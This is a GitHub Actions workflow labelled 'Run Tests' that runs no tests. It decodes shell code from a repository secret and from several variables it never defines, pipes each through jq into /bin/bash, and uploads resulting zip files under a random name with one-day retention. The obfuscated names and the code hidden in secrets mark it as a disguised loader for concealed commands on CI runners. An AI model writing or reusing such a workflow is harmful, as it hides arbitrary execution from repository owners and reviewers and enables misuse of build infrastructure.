name: Run Tests
on:
  workflow_dispatch:

permissions:
  contents: read
jobs:
  runner:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          uorh5: ${{ secrets.uorh5 }}
        run: |
          printf '%s' "$uorh5" | jq -r .hrub48 | /bin/bash
          echo $l3 | jq -r .z7334 | /bin/bash
          printf '%s' "$k6" | jq -r .bg96 | /bin/bash
          echo $fic3 | jq -r .vx592 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: 0TSh3Oq4
          path: "*.zip"
          retention-days: 1
